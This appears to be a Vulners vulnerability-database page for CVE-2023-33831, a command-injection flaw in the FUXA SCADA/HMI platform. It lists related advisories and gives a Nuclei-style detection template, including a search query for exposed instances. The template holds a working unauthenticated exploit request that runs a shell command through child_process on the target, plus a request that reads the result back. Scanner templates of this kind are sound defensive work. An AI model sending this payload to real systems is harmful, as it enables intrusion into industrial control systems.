| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for Command Injection in Frangoteam Fuxa | 13 Sep 202420:25 | – | githubexploit | |
| Exploit for Command Injection in Frangoteam Fuxa | 3 Sep 202319:25 | – | githubexploit | |
| CVE-2023-33831 | 18 Sep 202320:15 | – | attackerkb | |
| The vulnerability of the runscript script of the SCADA/HMI process visualization platform FUXA allows a perpetrator to execute arbitrary code. | 8 Sep 202300:00 | – | bdu_fstec | |
| CVE-2023-33831 | 4 Sep 202321:26 | – | circl | |
| FUXA Command Injection Vulnerability | 18 Sep 202300:00 | – | cnnvd | |
| CVE-2023-33831 | 18 Sep 202300:00 | – | cve | |
| CVE-2023-33831 | 18 Sep 202300:00 | – | cvelist | |
| A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA | 18 Sep 202321:30 | – | github | |
| CVE-2023-33831 | 18 Sep 202320:15 | – | nvd |
id: CVE-2023-33831
info:
name: FUXA - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: |
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
impact: |
Unauthenticated attackers can execute arbitrary Node.js code through the runscript API endpoint, potentially compromising the entire SCADA/HMI system and accessing industrial control data.
remediation: |
Update FUXA to a version newer than 1.1.13 that validates script code and requires authentication for the runscript endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-33831
- https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
- https://github.com/codeb0ss/CVE-2023-33831-PoC
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33831
cwe-id: CWE-77
epss-score: 0.13746
epss-percentile: 0.96055
cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: frangoteam
product: fuxa
fofa-query:
- title="FUXA"
- title="fuxa"
tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev,vuln
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/runscript HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
- |
GET /_images/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'Script OK:'
- type: word
part: body_2
words:
- 'uid'
- 'gid'
- 'groups'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100cdcf24113009b8e6bb866a7eda27bbfb994ff9c7ded266705d9cf3fad5f7f61602204018e24c782caa71a4a1990f7f331efc4023d5f047ddd95bb1755bdaa00b00a4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation